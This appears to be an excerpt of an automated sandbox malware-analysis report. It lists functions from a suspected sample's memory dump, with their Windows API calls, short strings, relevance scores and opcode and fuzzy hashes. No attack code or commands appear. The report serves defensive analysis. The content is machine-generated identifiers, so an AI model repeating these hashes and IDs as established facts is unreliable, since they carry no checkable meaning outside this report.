                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: ed9d91b897c2fa8e9e614409143a1f6fe999fda0306e399bd4e3b8aed6bffc72
                                                            • Instruction ID: 715c555d904e707c8bc60d22f443a9b8e0377c9a7f0343d2b68454b2d93db4ac
                                                            • Opcode Fuzzy Hash: ed9d91b897c2fa8e9e614409143a1f6fe999fda0306e399bd4e3b8aed6bffc72
                                                            • Instruction Fuzzy Hash: 811166B5D00209EFDB51CFD9D5449EEFBB9FB08310F104166E914E3220D731AA618F50
                                                            Function 0022B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0022B8FE
                                                            • _memset.LIBCMT ref: 0022B90D
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00267F20,00267F64), ref: 0022B93C
                                                            • CloseHandle.KERNEL32 ref: 0022B94E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3277943733-0
                                                            • Opcode ID: c82ba17455afed7884fa2b6caf34eac79e565b18144aedc91b255a41bb4017bf
                                                            • Instruction ID: 24f06a34d8720ab2d62a7813b5dc24f15c1ed0825a3a7ee308209b256b92296a
                                                            • Opcode Fuzzy Hash: c82ba17455afed7884fa2b6caf34eac79e565b18144aedc91b255a41bb4017bf
                                                            • Instruction Fuzzy Hash: 98F082B25543107BF2206BA1BC59FBB3A5CEB1935CF008070FB08D55A2D7B28D2087A8
                                                            Function 00206E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 00206E88
                                                              • Part of subcall function 0020794E: _memset.LIBCMT ref: 00207983
                                                            • _memmove.LIBCMT ref: 00206EAB
                                                            • _memset.LIBCMT ref: 00206EB8
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00206EC8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                            • String ID:
                                                            • API String ID: 48991266-0
                                                            • Opcode ID: 09d2e17aaaf9641a55c73f3cc2a3ea3d33401ddd499e62a6c30b1a0bb6de5802
                                                            • Instruction ID: eb6bc765a9e6dda13337ff38b9cef38c49e2cef637b025d31e6bc04795728155
                                                            • Opcode Fuzzy Hash: 09d2e17aaaf9641a55c73f3cc2a3ea3d33401ddd499e62a6c30b1a0bb6de5802
                                                            • Instruction Fuzzy Hash: F0F0303A100204BBCF516F55EC85E8ABB29EF55320B048065FE085E25BC731E921CBB4
                                                            Function 0022C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001A134D
                                                              • Part of subcall function 001A12F3: SelectObject.GDI32(?,00000000), ref: 001A135C
                                                              • Part of subcall function 001A12F3: BeginPath.GDI32(?), ref: 001A1373
                                                              • Part of subcall function 001A12F3: SelectObject.GDI32(?,00000000), ref: 001A139C
                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0022C030
                                                            • LineTo.GDI32(00000000,?,?), ref: 0022C03D
                                                            • EndPath.GDI32(00000000), ref: 0022C04D
                                                            • StrokePath.GDI32(00000000), ref: 0022C05B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                            • String ID:
                                                            • API String ID: 1539411459-0
                                                            • Opcode ID: 695ffc46cc4dfebc455bb51f99636b1bbbcf3ba9f792639383f0da17a7f5d541
                                                            • Instruction ID: 5e77096060340078131009f6fcdbd5b3717bc6d7e7dea7a9bfba3bc87362a6a3
                                                            • Opcode Fuzzy Hash: 695ffc46cc4dfebc455bb51f99636b1bbbcf3ba9f792639383f0da17a7f5d541
                                                            • Instruction Fuzzy Hash: 56F08232001269FBDB226F95BD0DFCE3F69AF06711F248010FA11610E287B55666CFD9
                                                            Function 001FA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 001FA399
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 001FA3AC
                                                            • GetCurrentThreadId.KERNEL32 ref: 001FA3B3
                                                            • AttachThreadInput.USER32(00000000), ref: 001FA3BA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 2710830443-0
                                                            • Opcode ID: a2db6936ae447cfcefb7293e8a62d8ff8957c09309487bc798cd762f21994b6d
                                                            • Instruction ID: c25c25e36d078bc3df56b8f31071bb391b359d8f11aea1e8359edecc6a646ae1
                                                            • Opcode Fuzzy Hash: a2db6936ae447cfcefb7293e8a62d8ff8957c09309487bc798cd762f21994b6d
                                                            • Instruction Fuzzy Hash: 5BE03971541228BADB201FA2EE0CEE73F6CFF167A1F808034F60C84060C7799541CBA0
                                                            Function 001A2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 001A2231
                                                            • SetTextColor.GDI32(?,000000FF), ref: 001A223B
                                                            • SetBkMode.GDI32(?,00000001), ref: 001A2250
                                                            • GetStockObject.GDI32(00000005), ref: 001A2258
                                                            • GetWindowDC.USER32(?,00000000), ref: 001DC0D3
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 001DC0E0
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 001DC0F9
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 001DC112
                                                            • GetPixel.GDI32(00000000,?,?), ref: 001DC132
                                                            • ReleaseDC.USER32(?,00000000), ref: 001DC13D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1946975507-0
                                                            • Opcode ID: a1b11d8f3b3da7e5fb39a80ed482949953f6fcf34425f1129e22e759417c0a3d
                                                            • Instruction ID: be32ea6a9e602c5da04fe9dc12eab8a5769a9865ed23d971982c40ba21290dae
                                                            • Opcode Fuzzy Hash: a1b11d8f3b3da7e5fb39a80ed482949953f6fcf34425f1129e22e759417c0a3d
                                                            • Instruction Fuzzy Hash: 8BE03932100244FADB615FA8FD0DBD83B20AB15332F448376FA69480E187B149A1DB51
                                                            Function 001F8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 001F8C63
                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,001F882E), ref: 001F8C6A
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001F882E), ref: 001F8C77
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,001F882E), ref: 001F8C7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: 0eb8a6417d320c2e99adeb5a85d2ddc0ea148f4049f7b62b5bb0d145b2143eed
                                                            • Instruction ID: c4cb8ca24672486ab2f8397a4f8e1d2a24a1b36d0bf79fc63e1bea6fd9a22db4
                                                            • Opcode Fuzzy Hash: 0eb8a6417d320c2e99adeb5a85d2ddc0ea148f4049f7b62b5bb0d145b2143eed
                                                            • Instruction Fuzzy Hash: 83E04F36646211EBD7709FF07E0DB963BB8AF557A2F045838A645CA040DB3484428B61
                                                            Function 001E2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 001E2187
                                                            • GetDC.USER32(00000000), ref: 001E2191
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001E21B1
                                                            • ReleaseDC.USER32(?), ref: 001E21D2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 2167ffc3acd4a73a3032c70b819bd947926e21621e109b373e88781e6f9deaab
                                                            • Instruction ID: 5cd5419bd14559b0f91e83a54a15c6c413daa6f655016f61639662c93466283d
                                                            • Opcode Fuzzy Hash: 2167ffc3acd4a73a3032c70b819bd947926e21621e109b373e88781e6f9deaab
                                                            • Instruction Fuzzy Hash: 56E01AB5800614EFDB619FA0EA0CAAD7BF9EB5C350F118425F96A97220DB7881429F40
                                                            Function 001E219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 001E219B
                                                            • GetDC.USER32(00000000), ref: 001E21A5
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001E21B1
                                                            • ReleaseDC.USER32(?), ref: 001E21D2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: d5133a5266b3eaf0b65d28fc4dc672503ebaf2cc899f62a497132c4cac738ea6
                                                            • Instruction ID: bd1417f238fe377776f00ed67bdff87425dfa4bc9f410de75525b578619085a3
                                                            • Opcode Fuzzy Hash: d5133a5266b3eaf0b65d28fc4dc672503ebaf2cc899f62a497132c4cac738ea6
                                                            • Instruction Fuzzy Hash: 12E01A75800204AFCB619FB0EA0C6AD7BF5EB5C310F118025F96A97220DB7891429F40
                                                            Function 001A63A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %#
                                                            • API String ID: 0-2930062601
                                                            • Opcode ID: f60acc2f5962489fc063e416346ad2dee6d09d023beb8dfca47b0cc833ed950f
                                                            • Instruction ID: 60dc6c0b1b243490a5966c7d6f9a0a38f24d58bb12eea1c0b67353486b5d59bb
                                                            • Opcode Fuzzy Hash: f60acc2f5962489fc063e416346ad2dee6d09d023beb8dfca47b0cc833ed950f
                                                            • Instruction Fuzzy Hash: ADB12779D042099BCF14EF94C8919FEB7B9FF1A350F184026E902A7295EB349E82CB51
                                                            Function 0021B1B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __itow_s
                                                            • String ID: xr&$xr&
                                                            • API String ID: 3653519197-4030113876
                                                            • Opcode ID: 1d663934c1647d1b1fe297326b294e1ad7d18195b95815406ca130785e997b27
                                                            • Instruction ID: 11f8ee5ba98b61349c640fb1159b0a288f275c839e6838ba722ffb1c7f7ae295
                                                            • Opcode Fuzzy Hash: 1d663934c1647d1b1fe297326b294e1ad7d18195b95815406ca130785e997b27
                                                            • Instruction Fuzzy Hash: F4B1A274A10209AFDB15DF54C890EEEB7F9FF69300F148059F9459B292EB70E991CB60
                                                            Function 0020B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001BFEC6: _wcscpy.LIBCMT ref: 001BFEE9
                                                              • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
                                                              • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
                                                            • __wcsnicmp.LIBCMT ref: 0020B298
                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0020B361
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                            • String ID: LPT
                                                            • API String ID: 3222508074-1350329615
                                                            • Opcode ID: 7f9dc656fcb0b0c70764f56c237ff52cb414d1d1ee94c4c571cd72ba8f1dbcf7
                                                            • Instruction ID: e649b2c40c35aac661a663f42f46e5a27641a8f9852119febf55a5904384cd6f
                                                            • Opcode Fuzzy Hash: 7f9dc656fcb0b0c70764f56c237ff52cb414d1d1ee94c4c571cd72ba8f1dbcf7
                                                            • Instruction Fuzzy Hash: 10619775A10315EFCB25DF94C885EAEB7B4EF19310F1140A9F946AB392DB70AE90CB50
                                                            Function 001B2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 001B2AC8
                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 001B2AE1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: 7bb98d68f020bd0e6b34fa7d8cf9d2952279ce513e139f94963ac49f6e458379
                                                            • Instruction ID: 27f352524ce5c648e68324fd38c17eeec1b403b3f30c42602c68b028055d808a
                                                            • Opcode Fuzzy Hash: 7bb98d68f020bd0e6b34fa7d8cf9d2952279ce513e139f94963ac49f6e458379
                                                            • Instruction Fuzzy Hash: 615156755187449BD320AF10D886BAFBBF8FF96314F42885DF1D9810A1EB308569CB26
                                                            Function 002099BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A506B: __fread_nolock.LIBCMT ref: 001A5089
                                                            • _wcscmp.LIBCMT ref: 00209AAE
                                                            • _wcscmp.LIBCMT ref: 00209AC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$__fread_nolock
                                                            • String ID: FILE
                                                            • API String ID: 4029003684-3121273764
                                                            • Opcode ID: c693304c31043e9c5def3945476fa7b71506df0f052d314ad12033c672c6402f
                                                            • Instruction ID: 543b2cc88053b33cbee546628d4af19b0b2d1268572eb084cede295f2c67abdb
                                                            • Opcode Fuzzy Hash: c693304c31043e9c5def3945476fa7b71506df0f052d314ad12033c672c6402f
                                                            • Instruction Fuzzy Hash: 6841D671A0070ABADF209FA4DC46FEFBBB9DF55714F000069B901A71C2DB75AA548BA1
                                                            Function 001E099E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID: Dt&$Dt&
                                                            • API String ID: 1473721057-847724317
                                                            • Opcode ID: adfcce0997f8efde6be53326282883dbe637e83b18aa943d82b6775bd1764588
                                                            • Instruction ID: ef01723b8aa269e9c54b2cb52889edc12d67125384509f64abb72e2b903a7e0a
                                                            • Opcode Fuzzy Hash: adfcce0997f8efde6be53326282883dbe637e83b18aa943d82b6775bd1764588
                                                            • Instruction Fuzzy Hash: 5A51E4786083428FD754CF19D584A2ABBF1BF9A354F94885DF9858B321D771EC81CB42
                                                            Function 00212882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00212892
                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002128C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_memset
                                                            • String ID: |
                                                            • API String ID: 1413715105-2343686810
                                                            • Opcode ID: d74962ab7dce79d9522e147a54ad67a73b2cbb2964880b196537cd680aa29603
                                                            • Instruction ID: 06eb15ad2abb785eda196f239fab491c0ce9a9688cc5c18e70f06e368d99e13b
                                                            • Opcode Fuzzy Hash: d74962ab7dce79d9522e147a54ad67a73b2cbb2964880b196537cd680aa29603
                                                            • Instruction Fuzzy Hash: 46314A71810119AFCF01EFA4DC85EEEBFB9FF29300F104029F814A6166DB315A66DBA0
                                                            Function 00226CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00226D86
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00226DC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$DestroyMove
                                                            • String ID: static
                                                            • API String ID: 2139405536-2160076837
